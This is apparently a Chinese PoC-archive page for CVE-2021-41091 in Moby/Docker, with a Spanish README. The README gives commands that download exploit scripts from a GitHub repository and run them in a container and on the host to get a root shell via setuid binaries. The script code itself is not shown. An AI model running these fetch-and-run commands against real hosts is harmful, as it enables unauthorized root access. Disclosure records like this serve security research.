关联漏洞
标题:
Moby 安全漏洞
(CVE-2021-41091)
描述:Moby是一个开源项目,旨在推动软件的容器化,并帮助生态系统使容器技术主流化。 Moby 存在安全漏洞,该漏洞源于在Moby (Docker Engine)中发现了一个bug,数据目录(通常是var lib Docker )包含的子目录权限没有受到足够的限制,允许没有特权的Linux用户遍历目录内容和执行程序。攻击者可利用该漏洞当容器包含具有扩展权限位(如setuid )的可执行程序时,没有特权的Linux用户可以发现并执行这些程序。
介绍
# CVE-2021-41091
Un bug en Moby (Docker Engine) permite a usuarios sin privilegios atravesar directorios y ejecutar programas directamente del docker en la maquina principal, si en el docker existe un progrma suid el usuario lo podra ejecutar como suid en la maquina principal
## PoC
En la terminal del contenedor descargamos el archivo ```docker.sh```, luego lo ejecutamos como usuario root:
```bash
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
```
Ahora en la maquina principal descargamos el archivo ```principal.sh``` y lo ejecutamos:
```bash
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
```
Ejecutamos el comando que nos dara el archivo y seremos capaces de ejecutar la /bin/bash como root
## Notas
Estos scripts fueron probados en Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) con la version de Moby 20.10.5+dfsg1
EL USO DE ESTE REPOSITORIO ES RESPONSABILIDAD DE QUIEN LO UTILICE Y NO DE EL AUTOR
文件快照
[4.0K] /data/pocs/8bc5b6ce8a995af38e27717a54165040a58f8616
├── [ 208] docker.sh
├── [1.0K] LICENSE
├── [ 460] principal.sh
└── [1.0K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。